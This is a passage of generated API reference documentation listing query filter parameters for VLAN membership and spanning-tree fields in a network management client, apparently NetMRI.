:type val_f_InterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_InterfaceID: If op_InterfaceID is specified, this value will be compared to the value in InterfaceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_InterfaceID must be specified if op_InterfaceID is specified.
:type val_c_InterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RootBridgeAddress: The operator to apply to the field RootBridgeAddress. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RootBridgeAddress: The spanning tree protocol root bridge address; this is the designated root with the STP priority portion removed. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_RootBridgeAddress: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RootBridgeAddress: If op_RootBridgeAddress is specified, the field named in this input will be compared to the value in RootBridgeAddress using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RootBridgeAddress must be specified if op_RootBridgeAddress is specified.
:type val_f_RootBridgeAddress: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RootBridgeAddress: If op_RootBridgeAddress is specified, this value will be compared to the value in RootBridgeAddress using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RootBridgeAddress must be specified if op_RootBridgeAddress is specified.
:type val_c_RootBridgeAddress: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpBridgeForwardDelay: The operator to apply to the field StpBridgeForwardDelay. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpBridgeForwardDelay: The value that all bridges use for ForwardDelay when this bridge is acting as the root. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpBridgeForwardDelay: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpBridgeForwardDelay: If op_StpBridgeForwardDelay is specified, the field named in this input will be compared to the value in StpBridgeForwardDelay using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpBridgeForwardDelay must be specified if op_StpBridgeForwardDelay is specified.
:type val_f_StpBridgeForwardDelay: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpBridgeForwardDelay: If op_StpBridgeForwardDelay is specified, this value will be compared to the value in StpBridgeForwardDelay using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpBridgeForwardDelay must be specified if op_StpBridgeForwardDelay is specified.
:type val_c_StpBridgeForwardDelay: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpBridgeHelloTime: The operator to apply to the field StpBridgeHelloTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpBridgeHelloTime: The value that all bridges use for HelloTime when this bridge is acting as the root. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpBridgeHelloTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpBridgeHelloTime: If op_StpBridgeHelloTime is specified, the field named in this input will be compared to the value in StpBridgeHelloTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpBridgeHelloTime must be specified if op_StpBridgeHelloTime is specified.
:type val_f_StpBridgeHelloTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpBridgeHelloTime: If op_StpBridgeHelloTime is specified, this value will be compared to the value in StpBridgeHelloTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpBridgeHelloTime must be specified if op_StpBridgeHelloTime is specified.
:type val_c_StpBridgeHelloTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpBridgeMaxAge: The operator to apply to the field StpBridgeMaxAge. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpBridgeMaxAge: The value that all bridges use for MaxAge when this bridge is acting as the root. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpBridgeMaxAge: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpBridgeMaxAge: If op_StpBridgeMaxAge is specified, the field named in this input will be compared to the value in StpBridgeMaxAge using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpBridgeMaxAge must be specified if op_StpBridgeMaxAge is specified.
:type val_f_StpBridgeMaxAge: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpBridgeMaxAge: If op_StpBridgeMaxAge is specified, this value will be compared to the value in StpBridgeMaxAge using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpBridgeMaxAge must be specified if op_StpBridgeMaxAge is specified.
:type val_c_StpBridgeMaxAge: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpDesignatedRoot: The operator to apply to the field StpDesignatedRoot. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpDesignatedRoot: The bridge identifier for this bridge. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpDesignatedRoot: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpDesignatedRoot: If op_StpDesignatedRoot is specified, the field named in this input will be compared to the value in StpDesignatedRoot using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpDesignatedRoot must be specified if op_StpDesignatedRoot is specified.
:type val_f_StpDesignatedRoot: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpDesignatedRoot: If op_StpDesignatedRoot is specified, this value will be compared to the value in StpDesignatedRoot using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpDesignatedRoot must be specified if op_StpDesignatedRoot is specified.
:type val_c_StpDesignatedRoot: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpForwardDelay: The operator to apply to the field StpForwardDelay. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpForwardDelay: This time value, measured in units of hundredths of a second, controls how fast a port changes its spanning state when moving towards the Forwarding state. The value determines how long the port stays in each of the Listening and Learning states, which precede the Forwarding state. This value is also used when a topology change has been detected and is underway, to age all dynamic entries in the Forwarding Database. This is the value currently in use on this bridge. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpForwardDelay: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpForwardDelay: If op_StpForwardDelay is specified, the field named in this input will be compared to the value in StpForwardDelay using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpForwardDelay must be specified if op_StpForwardDelay is specified.
:type val_f_StpForwardDelay: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpForwardDelay: If op_StpForwardDelay is specified, this value will be compared to the value in StpForwardDelay using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpForwardDelay must be specified if op_StpForwardDelay is specified.
:type val_c_StpForwardDelay: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpHelloTime: The operator to apply to the field StpHelloTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpHelloTime: The amount of time between the transmission of Configuration bridge PDUs by this node on any port when it is the root of the spanning tree, or trying to become so, in units of hundredths of a second. This is the actual value that this bridge is currently using. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpHelloTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpHelloTime: If op_StpHelloTime is specified, the field named in this input will be compared to the value in StpHelloTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpHelloTime must be specified if op_StpHelloTime is specified.
:type val_f_StpHelloTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpHelloTime: If op_StpHelloTime is specified, this value will be compared to the value in StpHelloTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpHelloTime must be specified if op_StpHelloTime is specified.
:type val_c_StpHelloTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpHoldTime: The operator to apply to the field StpHoldTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpHoldTime: This time value determines the interval length during which no more than two Configuration bridge PDUs shall be transmitted by this node, in units of hundredths of a second. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpHoldTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpHoldTime: If op_StpHoldTime is specified, the field named in this input will be compared to the value in StpHoldTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpHoldTime must be specified if op_StpHoldTime is specified.
:type val_f_StpHoldTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpHoldTime: If op_StpHoldTime is specified, this value will be compared to the value in StpHoldTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpHoldTime must be specified if op_StpHoldTime is specified.
:type val_c_StpHoldTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpMaxAge: The operator to apply to the field StpMaxAge. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpMaxAge: The maximum age of Spanning Tree Protocol information learned from the network on any port before it is discarded, in units of hundredths of a second. This is the actual value that this bridge is currently using. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpMaxAge: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpMaxAge: If op_StpMaxAge is specified, the field named in this input will be compared to the value in StpMaxAge using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpMaxAge must be specified if op_StpMaxAge is specified.
:type val_f_StpMaxAge: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpMaxAge: If op_StpMaxAge is specified, this value will be compared to the value in StpMaxAge using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpMaxAge must be specified if op_StpMaxAge is specified.
:type val_c_StpMaxAge: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpPriority: The operator to apply to the field StpPriority. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpPriority: The spanning tree protocol priority for this bridge in this VLAN. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpPriority: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpPriority: If op_StpPriority is specified, the field named in this input will be compared to the value in StpPriority using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpPriority must be specified if op_StpPriority is specified.
:type val_f_StpPriority: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpPriority: If op_StpPriority is specified, this value will be compared to the value in StpPriority using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpPriority must be specified if op_StpPriority is specified.
:type val_c_StpPriority: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpProtocolSpecification: The operator to apply to the field StpProtocolSpecification. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpProtocolSpecification: The protocol of spanning tree running for this VLAN. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpProtocolSpecification: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpProtocolSpecification: If op_StpProtocolSpecification is specified, the field named in this input will be compared to the value in StpProtocolSpecification using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpProtocolSpecification must be specified if op_StpProtocolSpecification is specified.
:type val_f_StpProtocolSpecification: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpProtocolSpecification: If op_StpProtocolSpecification is specified, this value will be compared to the value in StpProtocolSpecification using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpProtocolSpecification must be specified if op_StpProtocolSpecification is specified.
:type val_c_StpProtocolSpecification: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpRootCost: The operator to apply to the field StpRootCost. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpRootCost: The cost of the path to the root bridge as seen from this bridge. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpRootCost: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpRootCost: If op_StpRootCost is specified, the field named in this input will be compared to the value in StpRootCost using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpRootCost must be specified if op_StpRootCost is specified.
:type val_f_StpRootCost: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpRootCost: If op_StpRootCost is specified, this value will be compared to the value in StpRootCost using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpRootCost must be specified if op_StpRootCost is specified.
:type val_c_StpRootCost: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpRootPort: The operator to apply to the field StpRootPort. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpRootPort: The port number (i.e., the SwitchPortNumber attribute value of the interface) of the port that offers the lowest cost path from this bridge to the root bridge. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpRootPort: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpRootPort: If op_StpRootPort is specified, the field named in this input will be compared to the value in StpRootPort using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpRootPort must be specified if op_StpRootPort is specified.
:type val_f_StpRootPort: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpRootPort: If op_StpRootPort is specified, this value will be compared to the value in StpRootPort using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpRootPort must be specified if op_StpRootPort is specified.
:type val_c_StpRootPort: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpTopChanges: The operator to apply to the field StpTopChanges. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpTopChanges: The total number of topology changes detected by this bridge since the last reset. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpTopChanges: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpTopChanges: If op_StpTopChanges is specified, the field named in this input will be compared to the value in StpTopChanges using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpTopChanges must be specified if op_StpTopChanges is specified.
:type val_f_StpTopChanges: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpTopChanges: If op_StpTopChanges is specified, this value will be compared to the value in StpTopChanges using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpTopChanges must be specified if op_StpTopChanges is specified.
:type val_c_StpTopChanges: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VTPDomain: The operator to apply to the field VTPDomain. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VTPDomain: Management domain name if VLAN is VTP managed. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VTPDomain: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VTPDomain: If op_VTPDomain is specified, the field named in this input will be compared to the value in VTPDomain using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VTPDomain must be specified if op_VTPDomain is specified.
:type val_f_VTPDomain: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VTPDomain: If op_VTPDomain is specified, this value will be compared to the value in VTPDomain using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VTPDomain must be specified if op_VTPDomain is specified.
:type val_c_VTPDomain: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanID: The operator to apply to the field VlanID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanID: The internal NetMRI identifier of the VLAN associated with this VLAN membership. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VlanID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanID: If op_VlanID is specified, the field named in this input will be compared to the value in VlanID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanID must be specified if op_VlanID is specified.
:type val_f_VlanID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanID: If op_VlanID is specified, this value will be compared to the value in VlanID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanID must be specified if op_VlanID is specified.
:type val_c_VlanID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanMemberChangedCols: The operator to apply to the field VlanMemberChangedCols. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanMemberChangedCols: The fields that changed between this revision of the record and the previous revision. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VlanMemberChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanMemberChangedCols: If op_VlanMemberChangedCols is specified, the field named in this input will be compared to the value in VlanMemberChangedCols using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanMemberChangedCols must be specified if op_VlanMemberChangedCols is specified.
:type val_f_VlanMemberChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanMemberChangedCols: If op_VlanMemberChangedCols is specified, this value will be compared to the value in VlanMemberChangedCols using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanMemberChangedCols must be specified if op_VlanMemberChangedCols is specified.
:type val_c_VlanMemberChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanMemberEndTime: The operator to apply to the field VlanMemberEndTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanMemberEndTime: The ending effective time of this revision of this record, or empty if still in effect. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VlanMemberEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanMemberEndTime: If op_VlanMemberEndTime is specified, the field named in this input will be compared to the value in VlanMemberEndTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanMemberEndTime must be specified if op_VlanMemberEndTime is specified.
:type val_f_VlanMemberEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanMemberEndTime: If op_VlanMemberEndTime is specified, this value will be compared to the value in VlanMemberEndTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanMemberEndTime must be specified if op_VlanMemberEndTime is specified.
:type val_c_VlanMemberEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanMemberID: The operator to apply to the field VlanMemberID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanMemberID: The internal NetMRI identifier for this VLAN membership. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VlanMemberID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanMemberID: If op_VlanMemberID is specified, the field named in this input will be compared to the value in VlanMemberID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanMemberID must be specified if op_VlanMemberID is specified.
:type val_f_VlanMemberID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanMemberID: If op_VlanMemberID is specified, this value will be compared to the value in VlanMemberID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanMemberID must be specified if op_VlanMemberID is specified.
:type val_c_VlanMemberID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanMemberStartTime: The operator to apply to the field VlanMemberStartTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanMemberStartTime: The starting effective time of this revision of the record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VlanMemberStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanMemberStartTime: If op_VlanMemberStartTime is specified, the field named in this input will be compared to the value in VlanMemberStartTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanMemberStartTime must be specified if op_VlanMemberStartTime is specified.
:type val_f_VlanMemberStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanMemberStartTime: If op_VlanMemberStartTime is specified, this value will be compared to the value in VlanMemberStartTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanMemberStartTime must be specified if op_VlanMemberStartTime is specified.
:type val_c_VlanMemberStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanMemberTimestamp: The operator to apply to the field VlanMemberTimestamp. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanMemberTimestamp: The date and time this record was collected or calculated. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VlanMemberTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanMemberTimestamp: If op_VlanMemberTimestamp is specified, the field named in this input will be compared to the value in VlanMemberTimestamp using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanMemberTimestamp must be specified if op_VlanMemberTimestamp is specified.
:type val_f_VlanMemberTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanMemberTimestamp: If op_VlanMemberTimestamp is specified, this value will be compared to the value in VlanMemberTimestamp using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanMemberTimestamp must be specified if op_VlanMemberTimestamp is specified.
:type val_c_VlanMemberTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanName: The operator to apply to the field VlanName. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanName: The name of this VLAN as configured on this device. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VlanName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanName: If op_VlanName is specified, the field named in this input will be compared to the value in VlanName using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanName must be specified if op_VlanName is specified.
:type val_f_VlanName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanName: If op_VlanName is specified, this value will be compared to the value in VlanName using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanName must be specified if op_VlanName is specified.
:type val_c_VlanName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanState: The operator to apply to the field VlanState. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanState: The state of this VLAN on this device. Empty for non-bridge members.
The state 'mtuTooBigForDevice' indicates that this device cannot participate in this VLAN because the VLAN's MTU is larger than the device can support.
The state 'mtuTooBigForTrunk' indicates that while this VLAN's MTU is supported by this device, it is too large for one or more of the device's trunk ports. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VlanState: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanState: If op_VlanState is specified, the field named in this input will be compared to the value in VlanState using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanState must be specified if op_VlanState is specified.
:type val_f_VlanState: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanState: If op_VlanState is specified, this value will be compared to the value in VlanState using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanState must be specified if op_VlanState is specified.
:type val_c_VlanState: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanType: The operator to apply to the field VlanType. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanType: The type of this VLAN (1:ethernet, 2:fddi, 3:tokenRing, 4:fddiNet, 5:trNet, 6:deprecated) as configured on this device. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VlanType: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanType: If op_VlanType is specified, the field named in this input will be compared to the value in VlanType using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanType must be specified if op_VlanType is specified.
:type val_f_VlanType: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanType: If op_VlanType is specified, this value will be compared to the value in VlanType using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanType must be specified if op_VlanType is specified.
:type val_c_VlanType: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_network_id: The operator to apply to the field network_id. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. network_id: The Network View ID assigned to the Vlan membership. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_network_id: If op_network_id is specified, the field named in this input will be compared to the value in network_id using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_network_id must be specified if op_network_id is specified.
:type val_f_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_network_id: If op_network_id is specified, this value will be compared to the value in network_id using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_network_id must be specified if op_network_id is specified.
:type val_c_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the vlan members as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of vlan member methods. The listed methods will be called on each vlan member returned and included in the output. Available methods are: network_id, data_source, device, interface, vlan.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source, device, interface, vlan.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` VlanMemberID
